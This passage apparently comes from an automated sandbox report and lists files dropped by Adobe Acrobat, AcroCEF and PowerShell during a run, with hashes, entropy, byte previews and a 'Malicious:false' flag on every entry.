                                                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):0.8112781244591328
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:e:e
                                                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                    Malicious:false
                                                                                                    Preview:....
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1969
                                                                                                    Entropy (8bit):5.047109459502962
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Yufg2sSbMSlMtCM5mMOpiMAW0MretMSMmkaMY:rfHtYtt55V6AWLre6JmkhY
                                                                                                    MD5:274F6631B38AB3F0D7832DFB3637AF25
                                                                                                    SHA1:7E0C013CA2412C239AB38674084B8C213394D78D
                                                                                                    SHA-256:B2E4E11919DAAD8816D9FA77FB1D797E6DE127C61EA0D35A3A7D5A9326C6094F
                                                                                                    SHA-512:C539B5CB9E21D018A1F46BC471B1421BBFA55054A0319E9329A8BAD715A9B4E2B58095A25ED2CD5ED48689BBD73A9E6938C24F4DE8E0615DA3F507C4E3E0110A
                                                                                                    Malicious:false
                                                                                                    Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1731418211000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"23c88c8acf166d9fda5ae4d83df3db72","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696420889000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d5fa85f4cf271b5fa75367efd1b392fa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696420884000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c3af48ba3dee086edbbf20dff46c7ee0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696333862000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7101e009d8bf8920d0a3dd3f5dc75ebc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696333862000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"8558394a527c224775253e57d0e3596a","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1696333862000},{"id":"DC_Reader_RHP_Banner","info":{"dg":
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):1.187415922753023
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:TGufl2GL7msEHUUUUUUUUM/SvR9H9vxFGiDIAEkGVvpYf:lNVmswUUUUUUUUO+FGSItI
                                                                                                    MD5:FCD4D10DCDEA80C29F91A343FAA7E715
                                                                                                    SHA1:6B34F8B42FDC8E105D4091B97ABF4EAF3211555B
                                                                                                    SHA-256:B89E2CBC9427EAED83F0E3146A7B1C616AD38733778B3F4BF6C5E9953B1128A1
                                                                                                    SHA-512:97964774BEF9EA649A62D3C89123AE6907E1C86FF450B4DE9AD4F033A05E0C052F4021C91F5B984BEEEF308967688921B8ABFCDDF3E6BDAB7D5EA4F871F4CAA3
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:SQLite Rollback Journal
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8720
                                                                                                    Entropy (8bit):1.6065679379270525
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:7M/BlgKUUUUUUUUUUMDvR9H9vxFGiDIAEkGVv8nqFl2GL7ms6:7QlHUUUUUUUUUUsFGSItuKVms6
                                                                                                    MD5:FDC7DF8D202A20442DD8D608535D7B1A
                                                                                                    SHA1:005FC82484B4B213790CD81EA102F23B4013A6FF
                                                                                                    SHA-256:8385304B5305BB7BD5F93D4E18446F53F85CC1F3D7AE07FEDD56C7A886699491
                                                                                                    SHA-512:405542F9BBFC1E290312DE05BD044B13FB405D9F9A302D6929B8E69A5DAA03D0DA5818593A089807D09E6A3A64AD272746347F177DE9F79E5981063343F232C5
                                                                                                    Malicious:false
                                                                                                    Preview:.... .c.....w.>~......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66726
                                                                                                    Entropy (8bit):5.392739213842091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEgfMnzgPZhWQ1h0XivPFQiEwaTeYyu:6a6TZ44ADEfYzgPZhWQXzQeK
                                                                                                    MD5:3452CBABA5A3971D84B379C34D124F26
                                                                                                    SHA1:B1C79E3E64871E5ED6A7250B5E18A990340F87AC
                                                                                                    SHA-256:D3190475696922E99870CAFAC1805D48F7A52F410812E865578A5E8FF2BD0F50
                                                                                                    SHA-512:AF024C90E76043640DFAF6D177202372BE5BD751F93BC3988D05BE1414904B354DEC7D77F6D8DC985591C15DDCE66706B6D5B94634F8FF33F5FD20FE73F650DC
                                                                                                    Malicious:false
                                                                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26604
                                                                                                    Entropy (8bit):5.053883819182895
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:CinHzwiNKe+NZotAHk4VlOdB5cCYoUV3IpNBQkj29YQhj9ardFwOkMx:CinHzwiNKeLtAHk4VlOdB5cCYoUV3CNT
                                                                                                    MD5:7BB845A66FBC67C74AF32B48E35AC529
                                                                                                    SHA1:654F71D7B8EEF31D6DEFD3C5C9301DD88C7CC0B7
                                                                                                    SHA-256:03BCB325459833E54C43C7ACD18061CEBB288BC23E5310247CDD6F9AABB7C285
                                                                                                    SHA-512:A9D660C3DBB2EAE24BD1F4F0FEE60F697975839DDA07EA8E60061CE89190983464F32C3505587C5122E898A7C173E1AD97143C2D7FD414EDA78094AAEDCAB898
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE.(.......z..I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1........Add-MpPreference........Get-MpThreatCatalog........Get-MpThreat........Update-MpSignature........Remove-MpPreference........Get-MpPreference........Get-MpThreatDetection........Set-MpPreference........Get-MpComputerStatus........Start-MpScan........Start-MpWDOScan........Remove-MpThreat.........wMk.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1........Clear-BitLockerAutoUnlock........Lock-BitLocker........Backup-BitLockerKeyProtector........Resume-BitLocker........Disable-BitLockerAutoUnlock....!...BackupToAAD-BitLockerKeyProtector........Add-BitLockerKeyProtector........Unlock-BitLocker........Enable-BitLockerAutoUnlock........Disable-BitLocker........Remove-BitLockerKeyProtector........Enable-BitLocker........Suspend-BitLocker........Get-BitLockerVolume........@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerSh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                    MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                    SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                    SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                    SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):246
                                                                                                    Entropy (8bit):3.5085442896850614
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8qKPl/lPB:Qw946cPbiOxDlbYnuRKtKPFlJ
                                                                                                    MD5:5220CC76C21070884A9DADD3F380112A
                                                                                                    SHA1:B670B9FEA9BE28F1F8CEA0BE6D5002A5A403A07D
                                                                                                    SHA-256:8BB73D78BE6AD155881162F6B42B5F486A5F27B0F90876D405469932D0121C5F
                                                                                                    SHA-512:FD38482C48442B69C5C6FD8B1FE1828925099D29DB2DB0E55C480B133450D23260A716CCD5339A8B5724B1DE227511D5876DE1883E667A103B0195B243E8B77D
                                                                                                    Malicious:false
                                                                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.2./.1.1./.2.0.2.4. . .0.8.:.3.0.:.1.7. .=.=.=.....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):144514
                                                                                                    Entropy (8bit):7.992637131260696
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                                                    MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                                                    SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                                                    SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                                                    SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                                                    Malicious:false
                                                                                                    Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):144514
                                                                                                    Entropy (8bit):7.992637131260696
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                                                    MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                                                    SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                                                    SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                                                    SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                                                    Malicious:false
                                                                                                    Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:ASCII text, with very long lines (393)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16525
                                                                                                    Entropy (8bit):5.345946398610936
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                                    MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                                    SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                                    SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                                    SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                                    Malicious:false
                                                                                                    Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15114
                                                                                                    Entropy (8bit):5.317543757672833
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:hr9iVTw9lvq0XBsql2WLvRXvrQBBXFNyZWwcOrnldHYZseh8cDxDc7cZgF382dtY:3tC
                                                                                                    MD5:53FF5D20872FB5695F9135502B2B9D2A
                                                                                                    SHA1:FA4D4B9B95C1147F26E33D4330100894211252A4
                                                                                                    SHA-256:9544C3546587C3FC96EC314AF0752131D073F1811471A4A7F9324946D5A8072D
                                                                                                    SHA-512:D2121A6C328681E96E986D7C56ADA5C9E3B0AC63804A4832AFD527C54E8A1652A26EDF91624FA5AB6D91EAE502E0D5E0DC455789725B517DDF822EB6CD8B473D
                                                                                                    Malicious:false
                                                                                                    Preview:SessionID=dd1480c8-04ab-45ad-845b-4d3ae3e56b62.1731418210750 Timestamp=2024-11-12T08:30:10:750-0500 ThreadID=7304 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=dd1480c8-04ab-45ad-845b-4d3ae3e56b62.1731418210750 Timestamp=2024-11-12T08:30:10:751-0500 ThreadID=7304 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=dd1480c8-04ab-45ad-845b-4d3ae3e56b62.1731418210750 Timestamp=2024-11-12T08:30:10:751-0500 ThreadID=7304 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=dd1480c8-04ab-45ad-845b-4d3ae3e56b62.1731418210750 Timestamp=2024-11-12T08:30:10:751-0500 ThreadID=7304 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=dd1480c8-04ab-45ad-845b-4d3ae3e56b62.1731418210750 Timestamp=2024-11-12T08:30:10:751-0500 ThreadID=7304 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29752
                                                                                                    Entropy (8bit):5.383973107911502
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2ra:m
                                                                                                    MD5:9B5C71C517226BC41DDD6AB601DF066D
                                                                                                    SHA1:4B5A70AF8DA61DAE6A10BFCB02BA6400BA2CE4B5
                                                                                                    SHA-256:144211FD4364A5E15C0FD9FBA4D422E2CFBE08E7053F42C0AA39E7586C126E20
                                                                                                    SHA-512:74736A0A769E466F39F7DD8F3B4E81984C2F43EFE599AFAD7DF8227261FA936B3BD22B0E7EB0C1E9218361F22572EC4F26C52EFE88436ACAA96D3C51500DBFFD
                                                                                                    Malicious:false
                                                                                                    Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                    Category:dropped
                                                                                                    Size (bytes):386528
                                                                                                    Entropy (8bit):7.9736851559892425
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                    Malicious:false
                                                                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1407294
                                                                                                    Entropy (8bit):7.97605879016224
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                                                                    MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                                                                    SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                                                                    SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                                                                    SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                                                                    Malicious:false
                                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
